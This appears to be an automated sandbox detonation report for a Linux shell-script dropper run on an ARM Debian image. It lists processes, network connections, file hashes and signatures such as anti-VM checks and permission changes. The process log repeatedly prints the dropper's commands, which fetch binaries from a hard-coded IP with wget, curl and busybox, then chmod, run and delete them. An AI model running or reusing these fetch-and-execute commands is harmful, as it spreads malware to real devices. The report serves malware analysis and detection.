[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
GB 195.181.164.14:443 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 01:26

Reported

2024-10-25 01:29

Platform

debian9-armhf-20240611-en

Max time kernel

29s

Max time network

45s

Command Line

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z N/A
N/A /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO N/A
N/A /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S N/A
N/A /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME N/A
N/A /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV N/A
N/A /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH N/A
N/A /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal N/A
N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A
N/A /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 N/A
N/A /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj N/A
N/A /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm N/A
N/A /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ N/A
N/A /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /bin/busybox N/A
N/A N/A /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V N/A
N/A N/A /bin/rm N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO /usr/bin/curl N/A
File opened for modification /tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S /usr/bin/curl N/A
File opened for modification /tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V /usr/bin/curl N/A
File opened for modification /tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS /usr/bin/curl N/A
File opened for modification /tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8 /usr/bin/curl N/A
File opened for modification /tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj /usr/bin/curl N/A
File opened for modification /tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ /usr/bin/curl N/A
File opened for modification /tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv /usr/bin/curl N/A
File opened for modification /tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z /usr/bin/curl N/A
File opened for modification /tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME /usr/bin/curl N/A
File opened for modification /tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH /usr/bin/curl N/A
File opened for modification /tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal /usr/bin/curl N/A
File opened for modification /tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm /usr/bin/curl N/A

Processes

/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh

[/tmp/3cad0da87cfc3a14ea6c496218a6f38a7846f0a58c9696579e98ee15354b4c01.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/chmod

[chmod 777 SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/tmp/SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z

[./SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/bin/rm

[rm SwYoxdrOy2sLy7ADQClYf0Fv5ePlQMpD6Z]

/usr/bin/wget

[wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/chmod

[chmod 777 nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/tmp/nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO

[./nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/bin/rm

[rm nxvf3aWFFrdBKpVpU0rABOcmhgSVdqQcCO]

/usr/bin/wget

[wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/chmod

[chmod 777 PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/tmp/PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S

[./PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/bin/rm

[rm PIGWFg5O38WBUH58jbx7uR4D722W7Hu34S]

/usr/bin/wget

[wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/chmod

[chmod 777 hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/tmp/hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME

[./hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/bin/rm

[rm hZZEBISdMvZah3p3rvKpW6xRduWVr9TtME]

/usr/bin/wget

[wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/chmod

[chmod 777 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/tmp/8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV

[./8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/bin/rm

[rm 8iWcU5urwd7DrerKNPDGk2wfFOJrr1dUIV]

/usr/bin/wget

[wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/chmod

[chmod 777 TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/tmp/TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH

[./TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/bin/rm

[rm TibIFLckJ4arZ4dMHvrNiqBn9nK2jeOBfH]

/usr/bin/wget

[wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/chmod

[chmod 777 fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/tmp/fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal

[./fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/bin/rm

[rm fr5bQEQ1B9nc1vuHKvxz8gpnFTzUgNROal]

/usr/bin/wget

[wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/chmod

[chmod 777 WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/tmp/WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V

[./WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/bin/rm

[rm WiPM9yS0dD7odCZUrfiKRjfSmIadaljY8V]

/usr/bin/wget

[wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/chmod

[chmod 777 Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/tmp/Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS

[./Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/bin/rm

[rm Dvz4jcuWVZWcZAnMkgAVY7rjpGQ4nlSpUS]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/chmod

[chmod 777 ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/tmp/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8

[./ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/bin/rm

[rm ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

/usr/bin/wget

[wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/chmod

[chmod 777 yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/tmp/yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj

[./yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/bin/rm

[rm yVLJTBqsqQwDgoeAnGFKZVhjb4rgPB2Gxj]

/usr/bin/wget

[wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/chmod

[chmod 777 xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/tmp/xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm

[./xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/bin/rm

[rm xGqCEtAJf2hPL5oIZF73LFzMNVrGyrLKzm]

/usr/bin/wget

[wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/chmod

[chmod 777 uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/tmp/uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ

[./uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/bin/rm

[rm uGfemVqq2CcMUcCQfj7BzeIwCkgct6fUjJ]

/usr/bin/wget

[wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/chmod

[chmod 777 sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/tmp/sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv

[./sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/bin/rm

[rm sJobeomWxYGomfjFsTb5s0ariyjGJcJkqv]

/usr/bin/wget

[wget http://87.120.84.230/bins/ZBVBg5YSceOggHONB5o8vY0fMYTCfIU1H8]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
